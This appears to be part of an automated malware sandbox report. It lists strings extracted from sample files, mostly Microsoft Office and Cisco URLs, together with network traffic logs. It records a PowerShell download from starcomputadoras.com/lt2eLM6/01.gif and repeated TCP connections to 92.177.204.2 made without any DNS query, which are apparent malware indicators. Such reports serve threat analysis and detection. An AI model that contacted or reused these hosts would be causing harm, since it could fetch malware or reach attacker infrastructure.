Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://invites.office.com/
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://learninglocator.cloudapps.cisco.com/#/home
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://lifecycle.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://login.windows.local
Source: App_1675794384334539900_D9937C0E-ABFA-4834-B815-2855C722B4AF.log.2.dr	String found in binary or memory: https://login.windows.net
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://make.powerautomate.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://management.azure.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://management.azure.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://messaging.action.office.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://messaging.office.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://ncus.contentsync.
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://newsroom.cisco.com/c/r/newsroom/en/us/index.html
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://officeapps.live.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://onedrive.live.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://outlook.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://outlook.office.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://outlook.office365.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://outlook.office365.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://pdx-col.eum-appdynamics.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://pushchannel.1drv.ms
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://res.cdn.office.net/polymer/models
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://search.cisco.com/search?query=
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://settings.outlook.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://software.cisco.com/download/navigator.html
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://staging.cortana.ai
Source: powershell.exe, 00000009.00000002.33796253441.000001D653F04000.00000004.00000800.00020000.00000000.sdmp, in.cmd.7.dr	String found in binary or memory: https://starcomputadoras.com/lt2eLM6/01.gif
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://tasks.office.com
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://twitter.com/Cisco/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://wus2.contentsync.
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/ar_ae/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/ar_eg/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/cs_cz/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/da_dk/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/dam/en_us/about/supply-chain/cisco-modern-slavery-statement.pdf
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/de_at/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/de_ch/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/de_de/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/about.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/about/careers.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/about/case-studies-customer-success-stories/nfl-superbowl-lvi.html#%7E
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/about/contact-cisco.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/about/help.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/terms-conditions.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/trademarks.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/about/sitemap.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/buy.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/partners/connect-with-a-partner.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/products/security/security-outcomes-report.html?utm_medium=web-referra
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/solutions/enterprise/design-zone/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/solutions/hybrid-cloud.html?ccid=cc002960
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/solutions/secure-the-enterprise/index.html?ccid=cc003064
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/solutions/security/secure-hybrid-work-solution/index.html#~the-solutio
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/training-events/events.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en/us/training-events/training-certifications.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_ae/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_be/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_ca/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_dz/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_eg/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_hk/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_id/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_il/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_my/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_ph/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_sg/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/en_za/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/es_ar/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/es_bz/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/es_cl/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/es_co/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/es_cr/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/es_ec/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/es_es/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/es_mx/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/es_pa/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/es_pe/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/fr_be/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/fr_ca/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/fr_ch/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/fr_dz/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/fr_fr/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/hu_hu/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/it_it/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/ja_jp/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/ko_kr/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/m/en_us/about/csr/esg-hub.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/nl_be/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/nl_nl/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/no_no/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/pl_pl/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/pt_br/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/pt_pt/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/ro_ro/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/ru_ru/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/ru_ua/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/sv_se/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/th_th/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/tr_tr/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/uk_ua/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/vi_vn/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/zh_cn/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/zh_hk/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/c/zh_tw/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/site/au/en/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/site/in/en/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/site/uk/en/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/site/us/en/index.html
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.cisco.com/web/fw/i/logo-open-graph.gif
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.instagram.com/cisco/
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.linkedin.com/company/cisco
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.schema.org
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://www.youtube.com/user/cisco

Source: unknown

DNS traffic detected: queries for: starcomputadoras.com

Source: global traffic	HTTP traffic detected: GET /lt2eLM6/01.gif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: starcomputadoras.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cisco.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839

Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2
Source: unknown	TCP traffic detected without corresponding DNS query: 92.177.204.2

Source: X4QZWFTE.htm.15.dr	String found in binary or memory: <a class="fw-c-footer__social-channel --channel-facebook" href="https://www.facebook.com/Cisco/" title="Facebook" data-config-metrics-item="Facebook"> equals www.facebook.com (Facebook)
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: <a class="fw-c-footer__social-channel --channel-linkedin" href="https://www.linkedin.com/company/cisco" title="LinkedIn" data-config-metrics-item="LinkedIn"> equals www.linkedin.com (Linkedin)
